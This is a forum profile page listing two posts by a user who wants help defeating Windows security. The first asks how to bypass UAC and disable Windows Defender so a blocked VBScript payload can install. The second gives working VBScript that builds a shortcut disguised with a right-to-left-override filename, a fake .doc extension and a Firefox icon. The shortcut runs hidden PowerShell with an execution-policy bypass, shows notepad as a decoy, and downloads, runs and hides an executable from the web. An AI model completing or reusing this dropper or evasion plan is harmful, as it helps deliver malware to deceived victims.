Jump to content

cloudserver

Members
  • Content Count

    2
  • Joined

  • Last visited

About cloudserver

  • Rank
    Newbie
  1. I'd like to request assistance regarding how I can bypass windows 10 defender while I am actually tying to execute a vbscript payload. I have two VBS script. One the main Payload and the second is a VBScript that disabled windows antivirus but it raises UAC prompt. I am trying to bypass the UAC prompt then execute the VBscript to Disable the windows defender before downloading intstalling the main payload that get blocked by windows anti-malware. I would appreciate you assitance about this. Best Regards.
  2. I in situation where I am trying to make a shortcut file that download putty.exe into %appdata% directory and also execute the downloaded file in windows but the active script below just downloads putty.exe into %appdata% directory without executing the setupfile downloaded into %appdata%. Dim DownLoadLink, FileName DownLoadLink = "'https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe'" FileName = "'%AppData%\putty.exe'" Set WshShell = CreateObject("WScript.Shell") Set ShApp = CreateObject("Shell.Application") DesktopPath = ShApp.Namespace(0).Self.Path unicode = Unescape("%u0052%u0065%u0061%u0064%u004d%u0065%u005f%u202e%u0074%u0078%u0074%u002e%u006c%u006e%u006b") unicodeName = "unicode.lnk" shortcutPath = DesktopPath & "\" & unicodeName Set lnk = WshShell.CreateShortcut(shortcutPath) lnk.TargetPath = "powershell.exe" lnk.Arguments = "-ExecutionPolicy Bypass -WindowStyle Hidden -Command notepad.exe;(new-object System.Net.WebClient).DownloadFile(" & DownLoadLink & "," & FileName & ");./" & Filename & ";(get-item " & Filename & ").Attributes += 'Hidden';" lnk.IconLocation = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" lnk.Description = "Type: Shortcut File" lnk.Save() Set FSO = CreateObject("Scripting.FileSystemObject") Set file = FSO.GetFile(shortcutPath) file.name = unicode & ".doc" Any prossible solution this problem will be appreciated. Thanks
×
×
  • Create New...